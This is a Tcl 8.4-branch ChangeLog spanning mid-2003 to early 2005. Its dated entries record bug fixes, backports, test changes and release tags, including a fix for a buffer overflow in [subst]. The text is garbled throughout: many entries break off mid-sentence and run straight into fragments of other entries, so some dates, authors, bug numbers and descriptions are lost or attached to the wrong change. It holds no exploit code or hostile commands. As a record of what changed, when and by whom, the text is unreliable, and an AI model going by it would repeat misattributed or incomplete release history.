Regenerated from tcl.decls. * generic/tclStubInit.c: * doc/CrtChannel.3: Documentation of extended API, * generic/tcl.decls: extended testsuite, and * generic/tcl.h: implementation. Removal of old * generic/tclIO.c: driver-specific TclpCut/Splice * generic/tclInt.h: functions. Replaced with generic * tests/io.test: thread-action calls through the * unix/tclUnixChan.c: new hooks. Update of all builtin * unix/tclUnixPipe.c: channel drivers to version 4. * unix/tclUnixSock.c: Windows drivers extended to * win/tclWinChan.c: manage thread state in a thread * win/tclWinConsole.c: action handler. * win/tclWinPipe.c: * win/tclWinSerial.c: * win/tclWinSock.c: * mac/tclMacChan.c: 2005-01-25 Don Porter <[email protected]> * library/auto.tcl: Updated [auto_reset] to clear auto-loaded procs in namespaces other than :: [Bug 1101670]. 2005-01-25 Daniel Steffen <[email protected]> * unix/tcl.m4 (Darwin): fixed bug with static build linking to dynamic library in /usr/lib etc instead of linking to static library earlier in search path. [Bug 956908] Removed obsolete references to Rhapsody. * unix/configure: autoconf-2.13 2005-01-19 Mo DeJong <[email protected]> * win/tclWinChan.c (FileCloseProc): Invoke TclpCutFileChannel() to remove a FileInfo from the thread local list before deallocating it. This should have been done via an earlier call to Tcl_CutChannel, but I was running into a crash in the next call to Tcl_CutChannel during the IO finalization stage. 2005-01-17 Vince Darley <[email protected]> * tests/winFCmd.test: made test independent of current drive. [Bug 1066528] 2005-01-10 Donal K. Fellows <[email protected]> * unix/tclUnixFCmd.c (CopyFile): Convert u_int to unsigned to make clashes with types in standard C headers less of a problem. [Bug 1098829] 2005-01-06 Donal K. Fellows <[email protected]> * library/http/http.tcl (http::mapReply): Significant performance enhancement by using [string map] instead of [regsub]/[subst], and update version requirement to Tcl8.4. [Bug 1020491] 2005-01-05 Donal K. 
Fellows <[email protected]> * unix/tclUnixInit.c (localeTable): Add encoding mappings for some Chinese locales. [Bug 1084595] * doc/lsearch.n: Convert to other form of emacs mode control comment to prevent problems with old versions of man. [Bug 1085127] 2004] 2004-12-13 Kevin B. Kenny <[email protected]> * doc/clock.n: Clarify that the [clock scan] command does not accept the full range of ISO8601 point-in-time formats. [Bug 1075433] 2004-12-09 Donal K. Fellows <[email protected]> * doc/Async.3: Reword for better grammar, better nroff and get the flag name right. (Reported by David Welton.) 2004-12-06 Jeff Hobbs <[email protected]> *** 8.4.9 TAGGED FOR RELEASE *** * unix/tclUnixNotfy.c (NotifierThreadProc): init numFdBits [Bug 1079286] 2004-12-02 Jeff Hobbs <[email protected]> * changes: updated for 8.4.9 release 2004-12-02 Vince Darley <[email protected]> * generic/tclIOUtil.c: fix and new tests for [Bug 1074671] to * tests/fileSystem.test: ensure tilde paths are not returned specially by 'glob'. 2004-12-01 Don Porter <[email protected]> * library/auto.tcl (tcl_findLibrary): Disabled use of [file normalize] that caused trouble with freewrap. [Bug 1072136] 2004-11-26 Don Porter <[email protected]> * tests/reg.test (reg-32.*): Added missing testregexp constraints. * library/auto.tcl (tcl_findLibrary): Made sure the uniquifying operations on the search path does not also normalize. [Bug 1072136] 2004-11-26 Donal K. Fellows <[email protected]> * doc/dde.n: Resynchonized the documentation with itself and fixed some formatting errors. 2004-11-25 Zoran Vasiljevic <[email protected]> * doc/Notify.3: * doc/Thread.3: Added doc fixes and hints from [Bug 1068077]. 2004-11-25 Reinhard Max <[email protected]> * tests/tcltest.test: The order in which [glob] returns the file names * tests/fCmd.test: is undefined, so tests should not depend on it. 2004-11-24 Don Porter <[email protected]> * unix/tcl.m4 (SC_ENABLE_THREADS): Corrected failure to determine the number of arguments for readdir_r on SunOS systems. [Bug 1071701] * unix/configure: autoconf-2.13 2004-11-24 Jeff Hobbs <[email protected]> * README: Bumped patchlevel to 8.4.9 * generic/tcl.h: * tools/tcl.wse.in: * unix/tcl.spec, unix/configure, unix/configure.in: * win/configure, win/configure.in:] 2004-11-23 Don Porter <[email protected]> * generic/tclCmdIL.c (InfoVarsCmd): Corrected segfault in new * tests/info.test (info-19.6): trivial matching branch [Bug 1072654] 2004-11-23 Vince Darley <[email protected]> * generic/tclPathObj.c: fix and new test for [Bug 1043129] in * tests/fileSystem.test: the treatment of backslashes in file join on Windows.-19 Reinhard Max <[email protected]> *** 8.4.8 TAGGED FOR RELEASE *** * unix/installManPage: Classic sed doesn't support | in REs..13 * tests/unixInit.test (7.1): fixed failure when running tests with -tmpdir arg not set to working dir. 2004-11-18 Don Porter <[email protected]> * changes: Final updates for Tcl 8.4.8 release. 2004-11-16 Jeff Hobbs <[email protected]> * unix/tclUnixChan.c (TtySetOptionProc): fixed crash configuring -ttycontrol on a channel. [Bug 1067708] 2004-11-16 Andreas Kupries <[email protected]> * win/makefile.vc: Fixed bug in installation of http 2.5. * win/makefile.bc: Was installed into directory http2.4. * win/Makefile.in: This has been corrected. * unix/Makefile.in: * tools/tcl.wse.in: * tools/tclmin.wse: 2004-11-16 Don Porter <[email protected]> * library/auto.tcl: Updated [tcl_findLibrary] search path to include the $::auto_path. [RFE 695441] 2004-11-16 Donal K. 
Fellows <[email protected]> * doc/tclvars.n: Mention global variables set by tclsh and wish so they are easier to find. [Patch 1065732] 2004-11-15 Don Porter <[email protected]> *-12 Don Porter <[email protected]> * library/init.tcl: Made [unknown] robust in the case that either of the variables ::errorInfo or ::errorCode gets unset. [Bug 1063707] 2004-11-12 Jeff Hobbs <[email protected]> * generic/tclEncoding.c (TableFromUtfProc): correct crash condition when TCL_UTF_MAX == 6. [Bug 1004065] 2004-11-12 Daniel Steffen <[email protected]> * doc/clock.n: * doc/registry.n: * doc/upvar.n: fixed *roff errors uncovered by running 'make html'. * tools/tcltk-man2html.tcl: added faked support for bullet point lists, i.e. *nroff ".IP \(bu" syntax. Synced other changes from HEAD./tcltest.test: fixed bugs causing failures when running tests with -tmpdir arg not set to working dir. * macosx/Makefile: corrected path to html help inside framework. Prevent parallel make from building several targets at the same time. 2004-11-09 Donal K. Fellows <[email protected]> * doc/catch.n: Clarify documentation on return codes. [Bug 1062647] 2004-11-02 Don Porter <[email protected]> * changes: Updates for Tcl 8.4.8 release.): NaN-equality fix from Miguel Sofer. [Bug 761471] * doc/CrtChannel.3 (Tcl_GetChannelMode): Add synopsis. [Bug 1058446] 2004-10-31 Donal K. Fellows <[email protected]> * generic/tclCmdIL.c (InfoGlobalsCmd): * tests/info.test (info-8.4): Strip leading global-namespace specifiers from the pattern argument. [Bug 1057461] 2004-10-30 Miguel Sofer <[email protected]> * generic/tclCmdAH.c (Tcl_CatchObjCmd): removed erroneous comment [Bug 1029518] 2004-10-28 Andreas Kupries <[email protected]> * generic/tclAlloc.c: Fixed [Bug 1030548], a threaded debug * generic/tclThreadAlloc.c: build on Windows now works again. Had to * win/tclWinThrd.c: touch Unix as well. Basic patch by Kevin, * unix/tclUnixThrd.c: with modifications by myself. 2004-10-28 Don Porter <[email protected]> * README: Bumped patch level to 8.4.8 to prepare for * generic/tcl.h: next patch release. * tools/tcl.wse.in: * unix/configure.in: * unix/tcl.spec: * win/README.binary: * win/configure.in: * unix/configure: autoconf (2.13) * win/configure: 2004-10-28 Kevin B. Kenny <[email protected]> * generic/tclInt.decls: * unix/tclUnixTime.c (TclpGmtime, TclpLocaltime): * win/tclWinTime.c (TclpGmtime, TclpLocaltime): Changed type signatures of TclpGmtime and TclpLocaltime to accept CONST TclpTime_t throughout, to avoid any possible confusion in pedantic compilers. [Bug 1001319] * generic/tclIntDecls.h: * generic/tclIntPlatDecls.h: Regenerated. 2004-10-27 Don Porter <[email protected]> * generic/tclCmdAH.c (Tcl_FormatObjCmd): Restored missing line from yesterday's 868489 backport that caused failed alloc's on LP64 systems. * tests/appendComp.test: Backport test suite fixes of errors * tests/autoMkindex.test: revealed by -singleproc 1 -debug 1 * tests/exec.test: options to make test. * tests/execute.test: * tests/interp.test: * tests/io.test: * tests/namespace.test: * tests/regexpComp.test: * tests/stringComp.test: * tests/unixInit.test: * tests/winPipe.test: 2004-10-26 Kevin B. Kenny <[email protected]> * generic/tclCmdAH.c (Tcl_FormatObjCmd): Backport a missing bit of the [Bug 868489] fix. * generic/tclObj.c (SetBooleanFromAny): Backport fix for [Bug 1026125] * tests/format.test (format-19.1): Additional regression test for [Bug 868489]. 2004-10-26 Donal K. Fellows <[email protected]> * doc/*.n: Backporting of documentation updates. 
2004-10-26 Don Porter <[email protected]> * tests/subst.test (subst-12.3-5): More tests for [Bug 1036649] * tests/compile.test (compile-12.4): Backport test for [Bug 1001997] * tests/timer.test (timer-10.1): Backport test for [Bug 1016167] * tests/tcltest.test (tcltest-12.3,4): Backport setup corrections. * tests/error.test (error-6.3,4,7,9): Backport of some tests. * tests/basic.test (basic-49.*): * tests/namespace.test (namespace-8.7): * tests/init.test (init-2.8): Updated to not rely on http package. * generic/tclThreadTest.c (ThreadEventProc): Corrected subtle bug where the returned (char *) from Tcl_GetStringResult(interp) continued to be used without copying or refcounting, while activity on the interp continued. 2004-10-14 Donal K. Fellows <[email protected]> *-08 Jeff Hobbs <[email protected]> * win/tclWinFile.c (NativeIsExec): correct result of 'file executable' to not be case sensitive. [Bug 954263] 2004-10-05 Don Porter <[email protected]> * generic/tclNamesp.c (Tcl_PopCallFrame): Removed Bug 1038021 workaround. That bug is now fixed. 2004-09-30 Don Porter <[email protected]> * generic/tclNamespace.c (TclTeardownNamespace): Tcl_Obj-ified the * tests/namespace.test (namespace-8.5,6):Var.c (CallVarTraces): Save/restore the flag values * tests/var.test (var-16.1): that define part of the interpreter state during variable traces. [Bug 1038021] 2004-09-30 Miguel Sofer <[email protected]> * tests/subst.test (12.2): test correction. 2004-09-29 Miguel Sofer <[email protected]> * generic/tclBasic.c (Tcl_EvalEx): * tests/subst.test (12.1-2): fix for buffer overflow in [subst], [Bug 1036649]-18 Donal K. Fellows <[email protected]> * generic/tclExecute.c (TEBC-INST_LSHIFT,INST_RSHIFT): Ensure that large shifts end up shifting correctly. [Bug 868467] 2004-09-15 Daniel Steffen <[email protected]> * tests/load.test (load-2.3): adopted fix for failure on darwin from HEAD. 2004-09-14 Don Porter <[email protected]> * generic/tclObj.c (Tcl_GetIntFromObj): Corrected flaw in returning the int value of a wideInteger. [Bug 1027690] Don Porter <[email protected]> * generic/tclNamesp.c (Tcl_ForgetImport): Corrected faulty logic that * tests/namespace.test: relied exclusively on string matching and failed in the presence of [rename]s. [Bug 560297] Also corrected faulty prevention of [namespace import] cycles. [Bug 1017299] 2004-09-08 Kevin B. Kenny <[email protected]> * compat/strftime.c (_conv): Corrected a problem where hour 0 would format as a blank format group with %k. * tests/clock.test (clock-41.1): Added regression test case for %k at the zero hour. 2004-09-07 Kevin B. Kenny <[email protected]> * generic/tclTimer.c: Removed a premature optimisation that attempted to store the assoc data in the client data; the optimisation caused a bug that [after] would overwrite its imports. [Bug 1016167] 2004-09-02 Donal K. Fellows <[email protected]> * doc/lsearch.n: Clarified meaning of -dictionary. [Bug 759545]-08-30 Donal K. Fellows <[email protected]> * generic/tclCmdMZ.c (Tcl_StringObjCmd): Stop [string map] from crashing when its map and input string are the same object. 2004-08-27 Daniel Steffen <[email protected]> * tests/env.test: macosx fixes. 2004-08-19 Donal K. Fellows <[email protected]> * generic/tclScan.c (Tcl_ScanObjCmd, ValidateFormat): Ensure that the %ld conversion works correctly on 64-bit platforms. [Bug 1011860]]. 
* library/msgcat/pkgIndex.tcl: Bump to msgcat 1.3.3-07-30 Don Porter <[email protected]> *-28 Don Porter <[email protected]> * generic/tclMain.c (Tcl_Main, StdinProc): Append newline only to * tests/basic.test (basic-46.1): incomplete scripts as part of multi-line script construction. Do not add an extra trailing newline to the complete script. [Bug 833150] 2004-07-26 Jeff Hobbs <[email protected]> *** 8.4.7 TAGGED FOR RELEASE *** * tests/io.test (io-61.1): create file in binary mode for x-plat. 2004-07-25 Pat Thoyts <[email protected]> * generic/tclThreadAlloc.c: Moved the tclInt.h include to provide Tcl_Panic which is now required for non-threaded build. 2004-07-22 Don Porter <[email protected]> * tests/eofchar.data (removed): Test io-61.1 now generates its own * tests/io.test: file of test data as needed. 2004-07-21 Don Porter <[email protected]> * win/tclWinDde.c: Bump to dde 1.2.3 to cover changes * library/dde/pkgIndex.tcl: committed on 2004-06-14. * changes: Updated for Tcl 8.4.7-20 Daniel Steffen <[email protected]> * unix/tcl.m4: fixed Darwin autoconf breakage caused by recent CFLAGS reordering. * unix/configure: regen * unix/tclConfig.sh.in: replaced EXTRA_CFLAGS with CFLAGS. * unix/dltest/Makefile.in: replaced EXTRA_CFLAGS with DEFS. * Jeff Hobbs <[email protected]> * unix/Makefile.in, unix/tcl.m4: move (C|LD)FLAGS after their * unix/configure.in, unix/configure: _DEFAULT to allow for env setting to override m4 switches. Consolidate header checks to limit redundancy in configure. (CFLAGS_WARNING): Remove -Wconversion, add -fno-strict-aliasing for gcc builds (need to suppress 3.x type puning warnings). (SC_ENABLE_THREADS): Set m4 to force threaded build when built against a threaded Tcl core. Reorder configure.in for better 64-bit build configuration, replacing EXTRA_CFLAGS with CFLAGS. [Bug 874058] 2004-07-19 Zoran Vasiljevic <[email protected]> * win/tclwinThrd.c: redefined MASTER_LOCK to call TclpMasterLock. Fixes [Bug 987967] Zoran Vasiljevic <[email protected]> * generic/tclEvent.c (NewThreadProc): Backout of changes to fix [Bug 770053]. See SF bugreport for more info. * generic/tclNotify.c (TclFinalizeNotifier): Added conditional notifier finalization based on the fact that an TclInitNotifier has been called for the current thread. This fixes [Bug 770053] again. Hopefully this time w/o unwanted side-effects. 2004-07-14 Andreas Kupries <[email protected]> * generic/tclIO.h (CHANNEL_INCLOSE): New flag. Set in Tcl_Close * generic/tclIO.c (Tcl_UnregisterChannel): while the close callbacks * generic/tclIO.c (Tcl_Close):. [Bug 985869] (mistachkin) 2004-07-13 Jeff Hobbs <[email protected]> * README, generic/tcl.h, tools/tcl.wse.in: bumped to * unix/configure, unix/configure.in, unix/tcl.spec: patchlevel * win/README.binary, win/configure, win/configure.in: 8.4.7 2004-07-13 Zoran Vasiljevic <[email protected]> * generic/tclEvent.c (NewThreadProc): Fixed broken build on Windows caused by missing TCL_THREAD_CREATE_RETURN. This is backported from HEAD. Thnx to Kevin Kenny for spotting this. 2004-07-03 Miguel Sofer <[email protected]> * generic/tclExecute.c (ExprRoundFunc): * tests/expr-old.test (39.1): added support for wide integers to round(); [Bug 908375], reported by Hemang Lavana. 2004-07-02 Jeff Hobbs <[email protected]> * generic/regcomp.c (stid): correct minor pointer size error * generic/tclPipe.c (TclCreatePipeline): Add 2>@1 as a special * tests/exec.test: case redir of stderr to the result output. 
2004-07-02 Vince Darley <[email protected]> * tests/fileSystem.test: new tests backported * win/tclWin32Dll.c: compilation fix for VC++5.2 2004-06-29 Donal K. Fellows <[email protected]> * library/safe.tcl: Make sure that the temporary variable is local to the namespace and not inadvertently global. [Bug 981733]: See bug report for more information about what it does. [Bug 770053] *-14 Pat Thoyts <[email protected]> * tests/winDde.test: Fixed -async test * win/tclWinDde.c: Backported the fix from 8.5 to avoid hanging in the presence of applications that do not process Window messages. 2004-06-10 Andreas Kupries <[email protected]> * generic/tclDecls.h: Regenerated on a unix box. The Win/DOS * generic/tclIntDecls.h: EOLs from the last regen screwed up * generic/tclIntPlatDecls.h: compilation with an older gcc. * generic/tclPlatDecls.h: * generic/tclStubInit.c: 2004-06-10: handle warning [Bug 969066] 2004-06-05 Kevin B. Kenny <[email protected]> * generic/tcl.h: Corrected Tcl_WideInt declarations so that the mingw build works again. * generic/tclDecls.h: Changes to the tests for * generic/tclInt.decls: clock frequency in Tcl_WinTime * generic/tclIntDecls.h: so Reinhard Max <[email protected]> * generic/tclEncoding.c: * tests/encoding.test: added support and tests for translating embedded null characters between real nullbytes and the internal representation on input/output. [Bug 949905] Miguel Sofer <[email protected]> * doc/set.n: accurate description of name resolution process, referring to namespace.n for details [Bug 959180] 2004-05-22 Miguel Sofer <[email protected]> * generic/tclVar.c (TclObjUnsetVar2): backported fix [Bug 735335] and new (in tcl8.4) exteriorisations of [Bug 736729] due to the use of tclNsVarNameType obj types. The consequences of [Bug 736729] should be the same as in tcl8.3 and previous versions. The use of tclNsVarNameType objs is still disabled, pending a decision by the release manager. 2004-05-19 Donal K. Fellows <[email protected]> * and the check of its status return, leading to a bizarre error return of {POSIX unknown {No error}}. (Found in unplanned test - no incident logged at SourceForge.). [[this bug amended 2004-07-14]]-17 Kevin B. Kenny <[email protected]> * generic/tclInt.decls: Restored TclpTime_t kludge to all places * generic/tclIntPlatDecls.h: where it appeared before the changes of * unix/tclUnixPort.h 14 May, because use of native time_t in * unix/tclUnixTime.h its place requires the 8.5 header * win/tclWinTime.h: reforms. [Bug 955146] 2004-05-17 Donal K. Fellows <[email protected]> * doc/OpenFileChnl.3: Documented type of 'offset' argument to Tcl_Seek was wrong. [Bug 953374] 940278]-10 David Gravereaux <[email protected]> * win/tclWinPipe.c (BuildCommandLine): Append a space when the path got primed. (TclpCreateProcess): When under NT, with no console, and executing a DOS application, the path priming does not need an ending space as BuildCommandLine() will append one for us. 2004-05-07 Miguel Sofer <[email protected]> * doc/unset.n: added upvar.n to the "see also" list 2004-05-05. * generic/tclEncoding.c: Added FreeEncoding(systemEncoding) in TclFinalizeEncodingSubsystem because its ref count was incremented in TclInitEncodingSubsystem. * included, too. [Patch 858493] Also added DisableThreadLibraryCalls() for the DLL_PROCESS_ATTACH case. We're not interested in knowing about DLL_THREAD_ATTACH, so disable the notices. *. (SocketEventProc): connect errors should fire both the readable and writable handlers because this is how it works on UNIX. 
[Bug 794839] * win/coffbase.txt: Added the tls extension to the list of preferred load addresses.-04 Jeff Hobbs <[email protected]> * generic/tclIOUtil.c (Tcl_FSChdir): Work-around crash condition * tests/winFCmd.test (winFCmd-16.12): triggered when $HOME is volumerelative (ie 'C:'). * tests/fileName.test (filename-12.9): use C:/ instead of the first item in file volumes - that's usually A:/, which for most will have nothing in it. 2004-05-04 Don Porter <[email protected]> * tests/tcltest.test: Test corrections for Mac OSX. Thanks to Steven Abner (tauvan). [Bug 947440] 2004-05-03 Andreas Kupries <[email protected]> Applied [SF Tcl Patch 868853], fixing a mem leak in TtySetOptionProc. Report and Patch provided by Stuart Cassoff <[email protected]>.-23 Andreas Kupries <[email protected]> * generic/tclIO.c (Tcl_SetChannelOption): Fixed [Bug 930851]. When changing the eofchar we have to zap the related flags to prevent them from prematurely aborting the next read. 2004-04-07 Jeff Hobbs <[email protected]> * win/configure: * win/configure.in: define TCL_LIB_FLAG, TCL_BUILD_LIB_SPEC, TCL_LIB_SPEC and TCL_PACKAGE_PATH in tclConfig.sh. 2004-04-06 Don Porter <[email protected] Don Porter <[email protected]> * tests/tcltest.test: Corrected constraint typos: "nonRoot" -> "notRoot". Thanks to Steven Abner (tauvan). [Bug 928353] 2004-03-31 Don Porter <[email protected]> * doc/msgcat.n: Clarified message catalog file encodings. [Bug 811457] * library/msgcat/msgcat.tcl ([mcset], [ConvertLocale], [Init]):.3.2. 2004-03-31 Donal K. Fellows <[email protected]> * generic/tclObj.c (HashObjKey): Make sure this hashes the whole string rep of the object, instead of missing the last character. 2004-03-29 Jeff Hobbs <[email protected]> * generic/tclInt.h: * generic/tclEncoding.c (TclFindEncodings, Tcl_FindExecutable): * mac/tclMacInit.c (TclpInitLibraryPath):-21 Jeff Hobbs <[email protected]> * win/tclWinInt.h: define VER_PLATFORM_WIN32_CE if not already set. * win/tclWinInit.c (TclpSetInitialEncodings): recognize WIN32_CE as a unicode (WCHAR) platform. 2004-03-15. Fixed in HEAD on 2003-05-09, but backport to 8-4-branch was wrongly omitted; re-reported as [Bug 916795] by Roy Terry, diagnosed by dgp. 2004-03-08 Vince Darley <[email protected]> * generic/tclFileName.c: Fix to 'glob -path' near the root * tests/fileName.test: of the filesystem. [Bug 910525] 2004-03-01 Don Porter <[email protected]> *** 8.4.6 TAGGED FOR RELEASE *** * unix/tcl.m4 (SC_CONFIG_CFLAGS): Allow 64-bit enabling on IRIX64-6.5* systems. [Bug 218561] * unix/configure: autoconf-2.13 * generic/tclCmdMZ.c (TclCheckInterpTraces): The TIP 62 * generic/tclTest.c (TestcmdtraceCmd): implementation introduced a * tests/basic.test (basic-39.10): bug by testing the CallFrame level instead of the iPtr->numLevels level when deciding what traces created by Tcl_Create(Obj)Trace to call. Added test to expose the error, and made fix. [Request 4625 * tests/exec.test: contain Tcl-special chars like { or [. * tests/io.test: Should help us sort out Tcl Bug 554068. * tests/pid.test: * tests/socket.test: * tests/source.test: * tests/unixInit.test: 2004-02-25 Donal K. Fellows <[email protected]> * unix/tclUnixChan.c (TcpGetOptionProc): Stop memory leak with very long hostnames. [Bug 888777] 2004-02-25 David Gravereaux <[email protected]> * tests/winPipe.test: * win/tclWinPipe.c: backport of BuildCommandLine changes to mirror msvcrt's parse_cmdline() rules of quoting. 
2004-02-19> (reverted due to test failures on Solaris, but not Win/Lin :/) * generic/tclIOUtil.c: backport of rewrite of generic file normalization code to cope with links followed by '..'. [Bug 849514], and parts of [859251] * tests/unixInit.test: unixInit-7.1 * unix/tclUnixInit.c (TclpInitPlatform): ensure the std fds exist to prevent crash condition [Bug 772288] 2004-02-16 Jeff Hobbs <[email protected]> * generic/tclCmdMZ.c (TclTraceExecutionObjCmd) (TclTraceCommandObjCmd): fix possible mem leak in trace info. 2004-02-12 Jeff Hobbs <[email protected]> * README: update patchlevel to 8.4.6 * generic/tcl.h: * tools/tcl.wse.in: * unix/configure, unix/configure.in, unix/tcl.spec: * win/README.binary, win/configure, win/configure.in: * unix/tcl.m4: update HP-11 build libs setup 2004-02-06 Don Porter <[email protected]> * doc/clock.n: Removed reference to non-existent [file ctime]. 2004-02-04 Don Porter <[email protected]> *. [Bug 405995] 2004-01-13 Don Porter <[email protected]> *-09 Vince Darley <[email protected]> * generic/tclIOUtil.c: fix to infinite loop in TclFinalizeFilesystem. [Bug 873311] 2003-12-17 Daniel Steffen <[email protected]> * generic/tclBinary.c (DeleteScanNumberCache): fixed crashing bug when numeric scan-value cache contains NULL value. 2003-12-17 Zoran Vasiljevic <[email protected]> * generic/tclIOUtil.c: fixed 2 memory (object) leaks. This fixes [Bug 839519] 2003-12-12 Vince Darley <[email protected]> * generic/tclCmdAH.c: fix to normalization of non-existent user name ('file normalize ~nobody') [Bug 858937] 2003-12-09 Donal K. Fellows <[email protected]> * unix/tclUnixPort.h: #ifdef'd out declarations of errno which * tools/man2tcl.c: are known to cause problems with recent glibc. [Bug 852369] 2003-12-03 Don Porter <[email protected]> * generic/tcl.h: Bumped patch level to 8.4.5.1 to distinguish * unix/configure.in: CVS snapshots from 8.4.5 release. * unix/tcl.spec: * win/configure.in: * unix/configure: autoconf (2.13) * win/configure:meier for the report. [Bug 851747] 2003-12-01 Miguel Sofer <[email protected]> * doc/lset.n: fix typo [Bug 852224] 2003-11-21 Don Porter <[email protected]> *** 8.4.5 TAGGED FOR RELEASE *** * tests/windFCmd.test (winFCmd-16.10): Corrected failure to initialize variable $dd that caused test suite failure. 2003-11-20 Miguel Sofer <[email protected]> * generic/tclVar.c: fix flag bit collision between LOOKUP_FOR_UPVAR and TCL_PARSE_PART1 (deprecated) [Bug 835020] 2003-11-20 Vince Darley <[email protected]> * generic/tclIOUtil.c: * tests/winFCmd.test: fix to [Bug 845778] - Infinite recursion on [cd] (Windows only bug). 2003-11-18 Jeff Hobbs <[email protected]> * changes: updated for 8.4.5 release 2003-11-17 Don Porter <[email protected]> * generic/regcomp.c: Backported regexp bug fixes and tests. Thanks * generic/tclTest.c: to Pavel Goran and Vince Darley. * tests/reg.test: [Bugs 230589, 504785, 505048, 703709, 840258] 2003-11-10 Don Porter <[email protected]> * tests/unixInit.test (unixInit-2.10): re-enabled. * unix/tclUnixInit.c (TclpInitLibraryPath): Alternative fix * win/tclWinInit.c (TclpInitLibraryPath): for [Bug 832657] that should not run afoul of startup constraints. * library/dde/pkgIndex.tcl: Added safeguards so that registry * library/reg/pkgIndex.tcl: and dde packages are not offered * win/tclWinDde.c: on non-Windows platforms. Bumped to * win/tclWinReg.c: registry 1.1.3 and dde 1.2.2. 
2003-11-06 Jeff Hobbs <[email protected]> * tests/unixInit.test (unixInit-2.10): mark as knownBug * generic/tclEncoding.c (TclFindEncodings): revert patch from 2003-11-05. It wasn't valid in the sensitive startup init phase and broke Windows from working at all. 2003-11-07 Daniel Steffen <[email protected]> * macosx/Makefile: optimized builds define NDEBUG to turn off ThreadAlloc range checking. 2003-11-05 Don Porter <[email protected]> * generic/tclEncoding.c (TclFindEncodings): Normalize the path of the executable before passing to TclpInitLibraryPath() to avoid buggy handling of paths containing "..". [Bug 832657] * tests/unixInit.test (unixInit-2.10): New test for fixed bug. 2003-11-04 Daniel Steffen <[email protected]> * macosx/Makefile: added 'test' target. 2003-10-31 Vince Darley <[email protected]> * generic/tclTest.c: fix test suite memory leak (backport error) * unix/tclUnixFile.c: ensure translated path (required for correct error messages) is freed in both code paths.. 2003-10-22 Andreas Kupries <[email protected]> *-22 Andreas Kupries <[email protected]> * generic/tclIOUtil.c (FsListMounts, FsAddMountsToGlobResult): New functions. See below for context. (Tcl_FSMatchInDirectory): Modified to call on the new functions (above) to handle the mountpoints in the glob'bed directory correctly. Part of the patch by Vincent Darley to solve the [Bug 800106] for the 8.4.x series. * generic/tcl.h (TCL_GLOB_TYPE_MOUNT): New definition. Part of the patch by Vincent Darley to solve [Bug 800106] for the 8.4.x series. 2003-10-22 Donal K. Fellows <[email protected]> * generic/tclCmdAH.c (Tcl_FileObjCmd): Changed FILE_ prefix for option enumeration to FCMD_ to prevent collision with symbols [email protected]> * win/tclWinPipe.c (BuildCommandLine): Applied the patch coming with [Bug 805605] to the code, fixing the incorrect use of ispace noted by Ronald Dauster <[email protected]>. 2003-10-14 David Gravereaux <[email protected]> * win/tclAppInit.c (sigHandler): Punt gracefully if exitToken has already been destroyed. 2003-10-13 Vince Darley <[email protected]> * generic/tclCmdMZ.c: * tests/regexp.test: fix to [Bug 823524] in regsub; added three new tests. 2003-10-12 Jeff Hobbs <[email protected]> * unix/tclUnixTest.c (TestalarmCmd): don't bother checking return value of alarm. [Bug 664755] (english). Thanks to Yahalom Emet. [Bug 760947]/exec.test: Corrected temporary file management * tests/fileSystem.test: issues uncovered by -debug 1 test * tests/io.test: operations. Also backported some * tests/ioCmd.test: other fixes from the HEAD. */cmdMZ.test: Updated [package require tcltest] lines to * tests/fileSystem.test: indiciate that these test files * tests/notify.test: use features of tcltest 2. [Bug 706114] * tests/parseExpr.test: * tests/unixNotfy.test: 2003-10-06 Vince Darley <[email protected]> * generic/tclFileName.c: * generic/tclIOUtil.c: backport of volumerelative file normalization and 'file join' inconsistency fixes [Bug 767834, 813273]. 2003-10-04-03 Vince Darley <[email protected]> * tests/fileName.test: * tests/winFCmd.test: * doc/FileSystem.3: backported various test and documentation changes from HEAD. Backport of actual code fixes to follow. 2003-10-02 Don Porter <[email protected]> * README: Bumped patch level to 8.4.5 to prepare * generic/tcl.h: for next patch release. 
* tools/tcl.wse.in: * unix/configure.in: * unix/tcl.spec: * win/README.binary: * win/configure.in: * unix/configure: autoconf (2.13) * win/configure: * library/http/http.tcl: Bumped to http 2.4.5 * library/http/pkgIndex.tcl: 2003-10-01 Daniel Steffen <[email protected]> * macosx/Makefile: fixed redo prebinding bug when DESTDIR="". * mac/tclMacResource.c: fixed possible NULL dereference (bdesgraupes). 2003-09-29 Don Porter <[email protected]> * generic/tclBasic.c (CallCommandTraces): Added safety bit * tests/trace.test: masking to prevent any of the bit values TCL_TRACE_*_EXEC from leaking into the flags field of any Command struct. This does not fix [Bug 811483] but helps to contain some of its worst symptoms. Also backported the corrections to test trace-28.4 from Vince Darley. 2003-09-29 Donal K. Fellows <[email protected]> *-23 Don Porter <[email protected]> * generic/tclCmdMZ.c: Fixed [Bug 807243] where * tests/trace.test (trace-31,32.*): the introspection results of both [trace info command] and [trace info execution] were getting co-mingled. Thanks to Mark Saye for the report. * library/init.tcl (auto_load, auto_import): Expanded Eric Melski's 2000-01-28 fix for [Bug 218871] to all potentially troubled uses of [info commands] on input data, where glob-special characters could cause problems.-10 Don Porter <[email protected]> * library/opt/optparse.tcl: Overlooked dependence of opt 0.4.4 * library/opt/pkgIndex.tcl: on Tcl 8.2. Bumped to opt 0.4.4.1. 2003-09-01 Zoran Vasiljevic <[email protected]> * generic/tclIOUtil.c: backported fix from HEAD [Bug 788780]-06 Jeff Hobbs <[email protected]> * win/tclWinInit.c: recognize amd64 and ia32_on_win64 cpus and Windows CE platform.-24 Reinhard Max <[email protected]> * library/package.tcl: Fixed a typo that broke pkg_mkIndex -verbose. * tests/pkgMkIndex.test: Added a test for [pkg_mkIndex -verb): Backported fix for [Bug 775976] which causes the registry set command to fail when built with VC7. * library/reg/pkgIndex.tcl: Incremented the version to 1.1.2. 2003-07-21 Jeff Hobbs <[email protected]> *** 8.4.4 TAGGED FOR RELEASE *** * changes: updated for 8.4.4 release> * generic/tclIOUtil.c: correct MT-safety issues with filesystem records. [Bug 753315] (vasiljevic) * library/http/pkgIndex.tcl: merged to v2.4.4 from head * library/http/http.tcl: add support for user:pass info in URL. * tests/http.test: [Bug 759888] (shiobara) 2003-07-18 Don Porter <[email protected]> * generic/tclBasic.c: Corrected several instances of unsafe * generic/tclCompile.c: truncation of UTF-8 strings that might break * generic/tclProc.c: apart a multi-byte character. [Bug 760872] * library/init.tcl: * tests/init.test: * using * doc/CrtTrace.3: "null" everywhere to refer to the character * doc/Encoding.3: '\0', and using "NULL" everywhere to refer to * doc/Eval.3: the value of a pointer that points to nowhere. * doc/GetIndex.3: Also dropped references to ASCII that are no * doc/Hash.3: longer true, and standardized on the * doc/LinkVar.3:> * macosx/Makefile: added var to allow overriding of tclsh used during html help building (Landon Fuller). 2003-07-16 Mumit Khan <[email protected]> * generic/tclIOUtil) 2003-07-16 Donal K. 